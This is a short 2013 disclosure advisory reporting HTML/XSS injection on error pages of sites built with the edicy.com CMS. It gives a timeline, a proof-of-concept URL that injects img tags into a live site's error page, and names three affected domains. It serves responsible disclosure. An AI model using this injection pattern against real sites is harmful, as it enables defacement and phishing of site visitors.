0. Timeline
0.0 Discovery: 2013.10.22.
0.1.1 Sent First Report: 2013.11.15.
0.1.2 Vendor Response: 2013.11.15 -> "we are going to fix it by the 2013.11.16".
0.1.3 Sent Second Report: 2013.11.27 as XSS is still there.
0.1.4 Vendor Response: unknown. But they fixed it shortly after second contact.
0.2 Disclosure: 2013.12.28

1. Background
edicy.com is a closed source managed HTML content creation/management solution from Estonia[0].

2. Problem
Sites created with edicy.com have XSS[1] on error pages[2]. At least HTML img tag works, but iframe or applet wont.

3. Proof of Concept (PoC) Code
3.0 http://edicy site/<img src="url to a nice picture"></img>
3.1 This loads two pictures:
http://kelam.ee/%3Cimg%20src=%22http://upload.wikimedia.org/wikipedia/commons/thumb/a/a5/Tunne_Kelam_07.jpg/220px-Tunne_Kelam_07.jpg%22%3E%3C/img%3E%3Cimg%20src=%22http://shaan.typepad.com/photos/uncategorized/savisaar.gif%22%3E%3C/img%3E

4. Not an Exhaustive List of Affected Sites
4.0 kelam.ee
4.1 defendec.com
4.2 rmk.ee

5. References
[0] http://www.edicy.com/
[1] https://www.owasp.org/index.php/XSS_in_error_pages
[2] https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

APPENDIX - IMAGES
Savisaar+Kelam 01
Savisaar+Kelam 02